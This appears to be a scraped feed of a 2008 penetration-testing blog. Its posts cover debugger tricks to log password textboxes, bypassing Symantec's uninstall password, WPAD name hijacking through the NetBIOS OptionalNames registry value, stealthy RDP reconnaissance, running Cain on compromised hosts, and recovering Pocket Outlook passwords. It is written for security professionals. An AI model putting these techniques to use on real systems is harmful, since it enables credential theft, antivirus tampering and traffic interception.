0);">.text:0043460D jb loc_439769</span><br /><span style="font-family: courier new;">.text:00434613 movzx eax, word ptr [edi]</span><br /><span style="font-family: courier new;">.text:00434616 sub [ebp-14h], esi</span><br /><span style="font-family: courier new;">.text:00434619 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:0043461E push eax</span><br /><span style="font-family: courier new;">.text:0043461F call mightbe_MsoPopinfoGet</span></span><br /><br />My bet is:<br /><ul><li>Live Meeting client is not vulnerable to this flaw, because the codebase comes from PowerPoint Viewer 2007.</li><li>And PowerPoint Viewer 2007 has been patched against this flaw since the beginning, whereas PowerPoint 2007 "Gold" and SP1 have been left vulnerable.<br /></li></ul>Men, that was close...newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-81048056620315768922008-08-08T08:00:00.000+01:002008-08-08T08:00:11.186+01:00Pentester trick #5: debugging without debuggerHaving a debugger at hand is always useful in corner case pentesting (cf. <a href="http://newsoft-tech.blogspot.com/2008/08/pentester-trick-3-removing-symantec.html">bypassing Symantec password</a>). However, even if <a href="http://www.ollydbg.de/">OllyDbg</a> is a light-weight, standalone debugger, it might not always be possible to install new applications on the target system (e.g. Citrix servers, Web kiosks, mission critical servers).<br /><br />Fortunately, there is a built-in command-line debugger bundled with at least Windows 2000, XP and 2003 (this debugger has been removed from Windows Vista). And I am not talking about DEBUG.EXE ;) I am talking about NTSD.EXE, which is originally part of the <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">Debugging Tools for Windows</a>.<br /><br /><span style="font-style: italic;">Warning: NTSD has not been upgraded since Windows 2000. On Windows XP SP2, NTSD will randomly crash with a "BEX error" message (even if hardware DEP is not enabled).</span><br /><br />A useful application of debugging can be logging textboxes (which include <a href="http://www.nirsoft.net/utils/astlog.html">asterisks protected boxes</a>). Let's take a running NOTEPAD.EXE process for instance. The following command will attach NTSD to this process:<br /><span style="font-size:85%;"><span style="font-family:courier new;">ntsd -pn notepad.exe</span></span><br /><br />The WinDbg commands would be:<br /><span style="font-size:85%;"><span style="font-family:courier new;">bp GetWindowTextA "r $t0=poi(esp+8); gu; da @$t0; g;"</span> <span style="font-family:courier new;"><br />bp GetWindowTextW "r $t1=poi(esp+8); gu; du @$t1; g;"</span> </span><br /><br />Explanation: the target functions (ANSI and Unicode versions) have the following prototype:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int GetWindowText( HWND </span><i style="font-family: courier new;">hWnd</i><span style="font-family:courier new;">, LPTSTR </span><i style="font-family: courier new;">lpString</i><span style="font-family:courier new;">, int </span><i style="font-family: courier new;">nMaxCount</i><span style="font-family:courier new;"> );</span></span><br /><br />At the function entry point, save the <span style="font-style: italic;">lpString</span> pointer (esp+8) into a temporary register, then go up (until return), and read output value back.<br /><br />Unfortunately, this will not work with NTSD (<span style="font-style: italic;">BEX error</span>). We will have to find the RET address manually (using the <span style="font-style: italic;">step over</span> or the <span style="font-style: italic;">unassemble</span> command), then set the following breakpoints:<br /><span style="font-size:85%;"><span style="font-family: courier new;">bp 7e3b218c "da poi(esp+8); g;"</span><span style="font-family: courier new;"><br />bp 7e39ce0b </span></span> <span style="font-family: courier new;font-size:85%;" >"du poi(esp+8); g;"</span><br /><br />Then if we try to replace "it" by "works" using NOTEPAD menu:<br /><span style="font-size:85%;"><span style="font-family: courier new;">[...]</span><span style="font-family: courier new;"><br />0100a800 "it"</span><span style="font-family: courier new;"><br />0100a700 "works"</span><span style="font-family: courier new;"><br />[...]</span></span><br /><todo><br /><span style="font-style: italic;">Next post: how to log form boxes inside Internet Explorer.</span><br /></todo>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-55775287790440689482008-08-01T09:04:00.004+01:002008-08-01T09:51:03.234+01:00Pentester trick #4: removing Symantec Antivirus 10.2 without knowing the passwordAntivirus software is often the enemy of pentesting, because most useful tools (Cain, and even NetCat) are detected as "Potentially Unwanted Programs".<br /><br />Some antivirus are easy to disable (like stopping a service), others are a real pain (non stoppable drivers). Symantec Enterprise 10.2 with anti-tampering options belongs to the second category.<br /><br />Symantec Antivirus can be removed from the "Add/Remove Programs" Control Panel menu. However it asks for a password on removal.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecPassword.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecPassword.png" alt="" border="0" /></a><br /><br />This password is not a product feature, but a feature of Windows Installer subsystem. Therefore it is very easy to bypass. First step is to attach a debugger (like <a href="http://www.ollydbg.de/">OllyDbg</a>) to the <span style="font-family:courier new;">MsiExec.exe</span> process the password window is belonging to (this requires Administrative rights or Debug priviledge).<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecMSIEXEC.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecMSIEXEC.png" alt="" border="0" /></a><br />Second step is to set a breakpoint on <span style="font-family:courier new;">GetWindowTextA</span>. Then run the program, enter any password, and the breakpoint should be triggered. From that point, step out a few times until <span style="font-family:courier new;">TEST AL, AL</span> is encountered.<br /><br />Setting <span style="font-family:courier new;">AL</span> register to any non-zero value allows product uninstall.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/SymantecTest.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/SymantecTest.png" alt="" border="0" /></a><br />Note: ECX and EDX registers point to (entered and expected) password hashes. But this is an other story :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-14655622550602947512008-04-06T15:58:00.003+01:002008-04-06T17:55:08.872+01:00The case of "thumbs.db" fileMy Windows skills were recently challenged by a <a href="http://sid.rstack.org/blog/tb.php?id=257&chk=jyu3oq">blog post</a> of <a href="http://sid.rstack.org/">Cédric Blancher</a> about the "thumbs.db" file internals.<br /><br />It is widely documented that this file is an OLE container for holding thumbnail information, when the corresponding Explorer <a href="http://www.tunexp.com/tips/work_with_multimedia/disable_the_thumbnail_cache/">option</a> is checked (which is the default configuration). Some Open Source <a href="http://vinetto.sourceforge.net/">tools</a> even exist to parse the "thumbs.db" file.<br /><br />However, there is one more question that has been left unanswered: "how is custom image ordering preserved?".<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Naive approach</span></span><br /><br />A quick test yields the following empirical result:<br /><ul><li>Within Explorer, browse a folder which has a sub-folder where some images are stored. A "thumbs.db" file is created in this sub-folder, if necessary.</li><li>Enter the sub-folder and move images around. "Thumbs.db" file size increases.</li><li>Backup the existing "thumbs.db" file with the following commands:</li></ul><span style="font-size:85%;"><span style="font-family:courier new;">attrib -r -s -h thumbs.db</span><br /><span style="font-family:courier new;">copy thumbs.db backup.db</span></span><br /><ul><li>Shuffle images again. Compare the new "thumbs.db" file with the backup, using the following command:</li></ul><span style="font-size:85%;"><span style="font-family:courier new;">attrib -r -s -h thumbs.db</span><br /><span style="font-family:courier new;">fc /b backup.db thumbs.db</span></span><br /><br />Files should be exactly the same!<br /><br /><span style="font-weight: bold;font-size:130%;" >First trail</span><br /><br />In a sense, this is perfectly logical in Windows world, since <span style="font-style: italic;">image ordering is a per-user setting</span>. Two users sharing the same computer could order images differently without affecting each other's view. It would make no sense to store this is information in a single, shared file.<br /><br />Per-user settings could be stored in a configuration file (e.g. ".ini" file) inside the <span style="font-size:85%;"><span style="font-family:courier new;">%UserProfile%</span></span> directory, but this is very "Windows 3.1" style.<br /><br />At this point, we rather suspect that settings are stored under the HKCU registry hive.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Chasing the culprit</span></span><br /><br /><a href="http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx">Process Monitoring</a> the Explorer process could quickly become exhausting, given the amount of registry keys that are accessed during normal system operation. We will rather try to pinpoint the system component that manages the "thumbs.db" file.<br /><br />A fast and efficient approach is to search for string references in system directories:<br /><br /><span style="font-family: courier new;font-size:85%;" >C:\WINDOWS\SYSTEM32>strings *.dll | findstr /i thumbs.db<br /><br />C:\WINDOWS\SYSTEM32\mydocs.dll: thumbs.db<br />C:\WINDOWS\SYSTEM32\shell32.dll: Thumbs.db<br />C:\WINDOWS\SYSTEM32\shell32.dll: thumbs.db<br />C:\WINDOWS\SYSTEM32\wmp.dll: thumbs.db</span><br /><br />In this case, we use <a href="http://technet.microsoft.com/en-us/sysinternals/bb897439.aspx">strings.exe</a> from SysInternals, which has the big advantage over various "grep" ports to be able to handle ANSI and Unicode strings all together.<br /><br />A quick look inside <span style="font-family: courier new;font-size:85%;" >mydocs.dll</span> shows a string reference from <span style="font-size:85%;"><span style="font-family:courier new;">CleanupSystemFolder()</span></span> function, which does not seem to be related to our matter. Windows Media Player library (<span style="font-family: courier new;font-size:85%;" >wmp.dll</span>) does not seem to be a valid candidate either. Therefore, the core processing should be done in <span style="font-size:85%;"><span style="font-family:courier new;">shell32.dll</span></span>.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Shell32 internals</span></span><br /><br />Shell32 is a rather old and complex system component - a complete analysis is out of question.<br /><br />However a quick look inside this component yields interesting information:<br /><ul><li>It makes heavy use of the <a href="http://en.wikipedia.org/wiki/Component_Object_Model">COM model</a>.</li><li>It holds many interestingly named C++ classes, like CThumbnailMenu, CThumbStore and CEnumThumbStore.</li><li>Thumbnail processing is done in the background by a worker thread. Therefore changes are not immediately reflected, which hampers the Process Monitoring approach.<br /></li></ul>The key point is that CThumbStore class seems to implement <a href="http://msdn2.microsoft.com/en-us/library/ms687223%28VS.85%29.aspx">IPersistFile</a>, <a href="http://msdn2.microsoft.com/en-us/library/bb775348%28VS.85%29.aspx">IPersistFolder</a>, <a href="http://msdn2.microsoft.com/en-us/library/ms679731%28VS.85%29.aspx">IPersistStorage</a> and <a href="http://msdn2.microsoft.com/en-us/library/bb761154%28VS.85%29.aspx">IShellImageStore</a> interfaces, among others.<br /><br />This should ring a bell about <a href="http://msdn2.microsoft.com/en-us/library/aa768185%28VS.85%29.aspx">property bags</a>, which is the standard way for a COM object to store opaque, persistent data. Therefore we will make a great leap forward, and search directly for the "bags" keyword inside the binary file.<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Beginning to see the light</span></span><br /><br />The search for "bags" is successful: there is very few references, with very interesting content.<br /><br />The first reference comes from this registry key:<br /><span style="font-family: courier new;font-size:85%;" >HKCU\Software\Microsoft\Windows\ShellNoRoam\Bags</span><br /><br />It is referenced from:<br /><span style="font-size:85%;">CDefView::_SaveGlobalViewState()<br />CDefView::_ResetGlobalViewState()</span><br /><br />The second reference comes from this registry sub-key:<br /><span style="font-size:85%;"><span style="font-family:courier new;">DUIBags\ShellFolders\{00000000-0000-0000-0000-000000000000}</span></span><br /><br />It is referenced from:<br /><span style="font-size:85%;"><span style="font-family:courier new;">CDUIView::_InitializeShellFolderPropertyBag()</span></span><br /><br />Under the "ShellNoRoam" registry key, we could find thousands of numeric subkeys, which in turn hold values of interest, like the coordinates of the image. After digging a little more, we gather the following information:<br /><ul><li>Monitoring the "ShellNoRoam" key with Process Monitor reveals that registry information is updated only when exiting the folder.</li><li>Custom image ordering will be used on folder re-opening only if "remember each folder's view settings" is checked in Explorer configuration. Otherwise default layout is used.<br /></li><li>There is a <a href="http://support.microsoft.com/kb/813711">bug</a> in Windows XP pre-SP2 that prevents creating more than 200 custom views :)<br /></li></ul>At this point, there are still open questions, like "how does the <span style="font-size:85%;"><span style="font-family: courier new;">ItemPos</span></span> binary blob relates to effective image position?". This would require in-depth analysis of <span style="font-size:85%;"><span style="font-family: courier new;">CViewState::LoadPositionBlob()</span></span> maybe.<br /><br />But most of the question is answered for now!<br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Conclusion</span></span><br /><br />With a minimal amount of code analysis, we were able to pinpoint the code block that manages the "thumbs.db" file, and how persistent image location data is internally managed by the Explorer process.<br /><br /><span style="font-style: italic;">Final note: this article relates to Windows XP SP2 only. Windows Vista might exhibit different behaviour.</span>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-80723345322016579262008-04-04T22:02:00.005+01:002008-04-04T22:39:03.915+01:00The truth about Access 0-daysSecurity flaws in popular Office file formats (namely DOC, XLS and PPT) have been very common in the past few years, accounting for a large amount of Microsoft Security Bulletins (cf. slide #4 on <a href="http://download.microsoft.com/download/9/5/1/951c5d52-020b-4cda-b000-411864b3e4f2/Jour1-243-1-Fuzzing_des_documents_Office.pptx">this presentation</a>). They have been also involved in high-profile targeted attacks.<br /><br />However, flaws in lesser used Office file formats (namely PUB and MDB) were largely disregarded by Microsoft, for at least 2 reasons:<br /><ul><li>Access (.MDB) and Publisher (.PUB) applications are not part of Office Standard suite - they are available in higher grade SKUs only.</li><li>Access file format is considered "insecure by design" since automatic code execution on file opening cannot be blocked. Therefore MDB files are included in Microsoft <a href="http://support.microsoft.com/kb/883260">blocked</a> <a href="http://support.microsoft.com/kb/925330">list</a>. This list is enforced by Outlook application on attachments, among others.</li></ul>A large amount of "buffer overflow"-like bugs involving MDB files have been floating around since <a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2005-0944">year 2005</a> at least.<br /><br />Some malware authors recently found a way to bypass Microsoft filters by sending 2 attachments in the same email (or the same ZIP file): the first one is an approved Office file format (let's say DOC), the other has an unknown extension.<br /><br />However, when the Word document tries to open the second one as an ODBC Datasource using Jet Engine (where the flaw lies), it will disregard the extension.<br /><br /><a href="http://www.avertlabs.com/research/blog/index.php/2008/03/21/microsoft-jet-database-engine-attacked-through-word/trackback/">McAfee Avert Labs</a> blogged about that, but they missed something that is regularly re-discovered: OLE documents will be opened by the right Office application regardless of their extension.<br /><br />How to reproduce:<br /><ol><li>Create a new Word document named "test.doc".</li><li>Rename "test.doc" into "test.xxx" (the extension shall not be already registered).</li><li>Double-click on "test.xxx". Enjoy!</li></ol>Therefore, if you want to be protected against Office-based attacks, you shall block any unknown extension (or rather, use a white-list of "known safe" extensions) at your mail gateway.newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-85485030402363369032008-03-03T12:00:00.002+01:002008-03-03T16:54:50.224+01:00Pentester trick #3: using Cain without installing it<a href="http://www.oxid.it/">Cain</a> is one of the most useful pentesting tool for Windows. It has been rated #9 in the <a href="http://sectools.org/">Top 100</a> of security tools.<br /><br />While Cain is powerful when used on the pentester's computer, it is quite limited in terms of "pivoting" (i.e. using a compromised host as a bouncer to reach another part of the target network).<br /><br />Installing Cain on a compromised host yields at least two severe limitations :<br /><ol><li>Cain requires <a href="http://www.winpcap.org/">Winpcap</a>. If Winpcap is not found, Cain will refuse to load. Winpcap installs a new driver, and might require a reboot, which is not good in terms of footprint.<br /></li><li>Cain is being detected as <span style="font-style: italic;">Potentially Unwanted Software</span> by most antivirus software out there.</li></ol>Fortunately, both limitations can be removed.<br /><br />To have Cain loading properly, it is enough to add the following DLLs in Cain directory :<br /><ul><li>packet.dll</li><li>wanpacket.dll</li><li>wpcap.dll</li></ul>Note#1: without Winpcap driver, Cain will lack network features like password sniffing and ARP poisoning.<br /><br />To make Cain undetected by most (if not all) antivirus software, the software must be "repacked". However, this is another story :)<br /><br />Note#2: Cain still requires administrative rights on the compromised host.newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com4tag:blogger.com,1999:blog-26480225.post-49547018250367624422008-02-20T07:18:00.002+01:002008-02-22T22:40:32.358+01:00Pentester trick #2: faking NetBIOS names<span style="font-weight: bold;font-size:130%;" >Trick #2: faking NetBIOS names</span><br /><br />There has been a buzz at BlackHat US 2007 around <a href="https://www.blackhat.com/presentations/bh-usa-07/Moore_and_Valsmith/Presentation/bh-usa-07-moore_and_valsmith.pdf">H.D.Moore+Valsmith attack</a> against Internet Explorer autoconfiguration feature.<br /><br />To sum up, if anything is named after "WPAD" on the network, it will be considered as the enterprise Web proxy by Internet Explorer.<br /><br />The original attack is based on the "Dynamic DNS Update" feature of Windows DNS servers. DNS updates can be:<br /><ul><li>DNS-based, unauthenticated. Game over.</li><li>DNS-based, authenticated. Nice try, but since any domain user can create up to <a href="http://support.microsoft.com/kb/243327">10 computer accounts</a> in Active Directory, it is quite easy to name a computer "WPAD", join a domain and authenticate.<br /></li><li>DHCP-based. Game over, too: the DNS server will blindly trust your host name.<br /></li></ul>Ok, but what if "Dynamic DNS Update" feature has been disabled? Or if you need to quickly register names? Joining a new computer to the domain is <span style="font-style: italic;">not an option</span> in this case.<br /><br />Fortunately, everybody who has sniffed a Windows network for more than 5 minutes knows that most Windows clients "in the wild" use misconfigured name resolution: they rely on NBNS (<a href="http://en.wikipedia.org/wiki/NBNS">NetBIOS Name Service</a>) as a fallback.<br /><br />So how could you take advantage of a broadcasted NBNS request for "WPAD" (or anything else) to redirect target's traffic?<br /><br />One solution would be to use <a href="http://honeynet.rstack.org/tools.php">FakeNetBIOS</a> tools, but they rely on raw sockets, which are broken on Windows XP SP2. Another would be to use <a href="http://www.secdev.org/projects/scapy/">Scapy</a> as a NBNS responder, but Windows port is not mature yet :)<br /><br />As usual, the best solution is to rely on Windows built-in mechanisms to solve the puzzle.<br /><br />Under <a href="http://www.jsifaq.com/SF/Tips/Tip.aspx?id=0062"><b>HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters</b></a>, there is a value of type REG_MULTI_SZ called <b>OptionalNames</b>.<br /><br />Any name put in there will be claimed by the local computer during NBNS name resolution. Then:<br /><br /><span style="font-weight: bold;">net stop lanmanserver</span><br /><span style="font-weight: bold;">net start lanmanserver</span><br /><br />Job done!newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-83197089977032771772008-02-20T07:10:00.004+01:002008-02-20T10:28:18.864+01:00Pentester trick #1: using RDP Client 5 on Vista<a href="http://nonop.blogspot.com/">Nonop</a>'s recent <a href="http://nonop.blogspot.com/2008/02/kit-du-pentester.html">post</a> on pentester's essentials was inspiring enough for me to get back on-line, on this long-abandoned blog.<br /><br />So here is the first post of a (hopefully long) series about pentester tricks, from my very own field experience. Enjoy!<br /><br /><span style="font-weight: bold;font-size:130%;" >Trick #1 : using RDP Client 5 on Vista</span><br /><br />RDP Client 5 has a great advantage over RDP Client 6 : it allows connecting to the remote target without giving any credential ; thus the pentester can get access to server version, computer name and trusted domains, without leaving any track in the security audit trail.<br /><br />However RDP Client 6 has been pushed on Windows Update quite a while ago, and is required in some cases (like Windows Vista/2008 Remote Desktop with full security options ... which are recommended given flaws found in <a href="http://www.oxid.it/downloads/rdp-gbu.pdf">previous versions of RDP protocol</a>).<br /><br />Fortunately, it is quite easy to make both clients living together. RDP Client 5 consists of only 2 binaries : MSTSC.EXE and MSTSCAX.DLL. The trick is to copy both files, and to create a MSTSC.EXE.LOCAL file in the same directory. This will force MSTSC.EXE to load libraries from the current directory instead of the global system directory.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/rdp.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/rdp.png" alt="" border="0" /></a><br />References: [<a href="http://msdn2.microsoft.com/en-us/library/ms682600.aspx">1</a>] [<a href="http://msdn2.microsoft.com/en-us/library/ms811694.aspx">2</a>]newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-1150990250362919592006-06-22T16:25:00.000+01:002006-11-14T21:05:07.331+01:00<h1>Recovering Pocket Outlook passwords, part 2</h1><h2>Having a BLOB</h2>Now, it is time to recover the password from the protected BLOB. First step is to get a valid BLOB, we do that by setting a breakpoint just before and just after CryptProtectData().<br /><br /><span style="font-style: italic;">Before:</span><br /><br /><span style=";font-family:courier new;font-size:85%;" >BLOB = {<br />size=0x0A (10)<br />data=L"toto"<br />}</span><br /><br /><span style="font-style: italic;">After:</span><br /><br /><span style=";font-family:courier new;font-size:85%;" >BLOB = {<br />size=0x7E (126)<br />data=<br />00075C40 DCD 1<br />00075C44 DCD 0<br />00075C48 DCD 0<br />00075C4C DCD 0<br />00075C50 DCD 0<br />00075C54 DCD 0x20000000<br />00075C58 DCD 0<br />00075C5C DCD 0x6801<br />00075C60 DCD 0x10<br />00075C64 DCD 0x10<br />00075C68 DCD 0xFD7C53C<br />00075C6C DCD 0x5CD8C0A3<br />00075C70 DCD 0x7A39FA3F<br />00075C74 DCD 0xDA8959BD<br />00075C78 DCD 0<br />00075C7C DCD 0x8004<br />00075C80 DCD 0x10<br />00075C84 DCD 0x10<br />00075C88 DCD 0x65412C18<br />00075C8C DCD 0x6EDAE82<br />00075C90 DCD 0xE76ADC3<br />00075C94 DCD 0xC909937A<br />00075C98 DCD 0xA<br />00075C9C DCD 0x720053C6<br />00075CA0 DCD 0x6CD865A4<br />00075CA4 DCD 0x14C609<br />00075CA8 DCD 0xD5870000<br />00075CAC DCD 0x87F4EAE5<br />00075CB0 DCD 0xCBB1CE52<br />00075CB4 DCD 0x19CDF0BB<br />00075CB8 DCD 0xCC3F1E90<br />00075CBC DCD 0xCB6D</span> <h2>Finding password store</h2>Since passwords survive a reboot, this BLOB has to be stored somewhere in a persistent storage area. Under Windows CE 4.2, the most common way to do this is to use a Database.<br /><br />Having a look at system databases (using <a href="http://www.tucows.com/Windows/PDA/WindowsCE/PIM/DatabaseTools/">HPC Database Viewer</a> for example), we quickly find that the BLOB is stored in the "pMailFolders" database, with property identifier #0x8304.<br /><h2>Getting the password back</h2>There are several steps to retrieve a cleartext password:<br /><ul><li>Getting the BLOB out of the Database ;</li><li>Calling CryptUnprotectData() correctly.</li></ul>Let's write a little <a href="http://newsoft.dyndns.org/blog/GetPassword-free.zip">piece of code</a> that does both. Surprisingly, it works out of the box! That means that the CRYPTPROTECT_SYSTEM flag is not enforced by the kernel in my case!<br /><br />In case CryptUnprotectData() fails, here are some tricks that could work:<br /></http:><ul><li><http:>Calling COREDLL!SetProcPermissions(-1) ;</http:></li><li><http:>Traditional WriteProcessMemory()/CreateRemoteThread() combination ;</http:></li><li><http:>Understanding the CryptoAPI BLOB format, for hand decryption.</http:></li></ul><http:>If you want to know more ... just send me PDA's :)<br /><br /><span style="font-style: italic;">Greets: mao from <a href="http://www.oxid.it/">oxid.it</a></span> </http:>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0